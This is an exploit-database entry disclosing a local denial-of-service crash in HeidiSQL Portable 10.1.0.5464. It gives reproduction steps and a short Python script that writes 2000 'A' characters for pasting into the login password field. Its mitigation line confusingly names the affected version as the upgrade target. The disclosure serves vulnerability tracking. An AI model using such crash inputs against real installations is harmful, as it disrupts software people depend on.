HeidiSQL Portable 10.1.0.5464 - Denial of Service (PoC)

vendor:

HeidiSQL Portable

by:

Victor Mondragón

7.8

CVSS

HIGH

Denial of Service

400

CWE

Product Name: HeidiSQL Portable

Affected Version From: 10.1.0.5464

Affected Version To: 10.1.0.5464

Patch Exists: Yes

Related CWE: N/A

CPE: a:heidisql:heidisql_portable:10.1.0.5464

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Single Language x64 / Windows 7 x32 Service Pack 1

2019

HeidiSQL Portable 10.1.0.5464 – Denial of Service (PoC)

HeidiSQL Portable 10.1.0.5464 is vulnerable to a denial of service attack. By running the python code HeidiSQL_Portable_10.1.0.5464.py, a file bd_p.txt is created with 2000 'A' characters. When this file is copied to the clipboard and pasted into the 'Password' field of the 'Login' window, the application crashes.

Mitigation:

Upgrade to the latest version of HeidiSQL Portable 10.1.0.5464.

Source

Exploit-DB raw data:

#Exploit Title: HeidiSQL Portable 10.1.0.5464 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-04-24
#Vendor Homepage: https://www.heidisql.com/
#Software Link: https://www.heidisql.com/downloads/releases/HeidiSQL_10.1_64_Portable.zip
#Tested Version: 10.1.0.5464
#Tested on: Windows 10 Single Language x64 / Windows 7 x32 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: HeidiSQL_Portable_10.1.0.5464.py
#2.- Open bd_p.txt and copy content to clipboard
#2.- Open HeidiSQL
#3.- Select "New"
#4.- In Network type select "Microsoft SQL Server (TCP/IP)"
#5.- Enable "Prompt for credentials" > click on "Open"
#6.- In Login select "Password" and Paste ClipBoard
#6.- Click on "Login"
#7.- Crashed

cod = "\x41" * 2000

f = open('bd_p.txt', 'w')
f.write(cod)
f.close()